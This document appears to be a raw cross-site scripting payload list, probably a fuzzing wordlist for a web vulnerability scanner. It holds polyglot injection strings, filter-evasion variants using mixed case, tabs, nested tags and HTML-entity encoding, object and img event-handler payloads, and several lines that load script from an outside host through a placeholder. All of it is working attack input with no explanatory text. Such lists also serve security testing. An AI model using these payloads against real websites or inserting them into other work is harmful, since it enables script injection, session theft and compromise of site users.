';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

<script>alert('__XSS__')</script>
<script>alert("__XSS__")</script>
<ScRiPt>alert('__XSS__')</sCrIpT>
<ScRiPt>alert("__XSS__")</sCrIpT>
<script>String.fromCharCode(0,__XSS__,1)</script>
<ScRiPt>String.fromCharCode(0,__XSS__,1)</sCrIpT>
<script src=http://__XSS__/x.js></script>
<ScRiPt src=http://__XSS__/x.js></sCrIpT>
<script[TAB]src=http://__XSS__/x.js></script>
<ScRiPt[TAB]src=http://__XSS__/x.js></sCrIpT>

<img src=. onerror=alert("__XSS__")>
<img src=. onerror=alert('__XSS__')>
<img src=. onerror=String.fromCharCode(0,__XSS__,1)>
<img[TAB]src=.[TAB]onerror=String.fromCharCode(0,__XSS__,1)>

<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;__XSS__;&#39;&#41;>
<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29>
<img[TAB]src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29>

<script >alert('__XSS__')</script >
<script >alert("__XSS__")</script >
<script >String.fromCharCode(0,__XSS__,1)</script >
<ScRiPt >String.fromCharCode(0,__XSS__,1)</ sCrIpT>
<ScRiPt[TAB]>String.fromCharCode(0,__XSS__,1)</[TAB]sCrIpT>
<script/>alert('__XSS__')</script/>
<script/>alert("__XSS__")</script/>
<ScRiPt/>alert('__XSS__')</sCrIpT/>
<ScRiPt/>alert("__XSS__")</sCrIpT/>
<script/ src=http://__XSS__/x.js></script/>
<ScRiPt/ src=http://__XSS__/x.js></sCrIpT/>
<scr<script>ipt>alert('__XSS__')</script>
<scr<script>ipt>alert('__XSS__')</scr</script>ipt>
<scr<script>ipt>alert("__XSS__")</script>
<scr<script>ipt>alert("__XSS__")</scr</script>ipt>
<scr<script>ipt>String.fromCharCode(0,__XSS__,1)</script>
<scr<script>ipt>String.fromCharCode(0,__XSS__,1)</scr</script>ipt>
<scr<script>ipt src=http://__XSS__/x.js></script>
<scr<script>ipt src=http://__XSS__/x.js></scr</script>ipt>
<object data="javascript:alert('__XSS__')">
<object data=javascript:String.fromCharCode(0,__XSS__,1)>
<object[TAB]data=javascript:String.fromCharCode(0,__XSS__,1)>
<object><param name=x value=javascript:alert('__XSS__')></object>
<object><param name=x value=javascript:alert("__XSS__")></object>
<object><param name=x value=javascript:String.fromCharCode(0,__XSS__,1)></object>
